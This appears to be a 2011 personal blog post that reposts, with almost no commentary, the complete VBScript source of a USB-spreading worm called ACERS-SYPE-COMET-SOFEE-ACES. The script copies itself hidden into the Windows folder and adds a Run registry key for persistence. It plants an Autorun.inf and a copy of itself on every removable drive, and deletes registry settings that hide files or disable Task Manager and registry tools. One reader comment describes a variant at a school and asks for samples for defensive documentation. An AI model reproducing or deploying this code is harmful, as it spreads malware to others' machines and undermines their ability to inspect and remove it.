This page has been viewed this much;

Monday, February 28, 2011

ACERS-SYPE-COMET-SOFEE-ACES virus

I got this code from this titled virus long time ago and it was stuck on my previous blogger account so i couldn't edit it.

Anyway here is the code reposted from Pepper ViewMaster which is also me.


On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "ACERS-SYPE-COMET-SOFEE-ACES.vbs" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")

Set myFile = fso.CreateTextFile(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs"""

If ax = false Then wscr.Run "wscript.exe """ & win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs"""

While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives

If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then
If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
End If
Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
auFile.write "[autorun]" & vbCrLf & "open=wscript.exe ACERS-SYPE-COMET-SOFEE-ACES.vbs" & vbCrLf & "shell\Open\Command=wscript.exe ACERS-SYPE-COMET-SOFEE-ACES.vbs" & vbCrLf & "shell\Open\Default=1"
auFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=39

Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs")
fAttr.Attributes=39
End If
Next

With wscr
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")
.RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun")
.RegDelete( "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools")
.RegDelete("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr")
End With

If tf <> win & "\ACERS-SYPE-COMET-SOFEE-ACES.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If

WScript.Sleep 10000

Wend
 
 

Posted by at

1 comment:

  1. AremsiFebruary 28, 2011 at 8:13 PM

    in our school it was already removed but replaced with another script of the same content.

    the file is pepito.vbs

    if you find something like this,try posting it here so we can document the activity and further strengthen the defense against these annoying virus.

    ReplyDelete

Subscribe to: Post Comments (Atom)